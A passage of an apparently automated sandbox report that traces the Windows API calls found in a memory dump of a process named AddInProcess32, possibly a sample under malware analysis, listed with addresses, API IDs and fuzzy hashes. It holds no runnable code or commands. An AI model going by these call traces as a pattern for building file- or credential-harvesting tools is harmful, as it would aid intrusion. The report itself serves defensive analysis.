                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 2445788494-0
                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 3150196962-0
                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                            APIs
                                            Strings
                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: malloc
                                            • String ID: failed to allocate %u bytes of memory
                                            • API String ID: 2803490479-1168259600
                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                            APIs
                                            • memset.MSVCRT ref: 0041BDDF
                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcmpmemset
                                            • String ID:
                                            • API String ID: 1065087418-0
                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                            • String ID:
                                            • API String ID: 1381354015-0
                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                            APIs
                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                            • String ID:
                                            • API String ID: 2154303073-0
                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                            APIs
                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 3150196962-0
                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$PointerRead
                                            • String ID:
                                            • API String ID: 3154509469-0
                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                            APIs
                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                            • String ID:
                                            • API String ID: 4232544981-0
                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                            APIs
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$FileModuleName
                                            • String ID:
                                            • API String ID: 3859505661-0
                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                            APIs
                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                            APIs
                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                            APIs
                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                            APIs
                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                            APIs
                                            • memset.MSVCRT ref: 004095FC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                            • String ID:
                                            • API String ID: 3655998216-0
                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
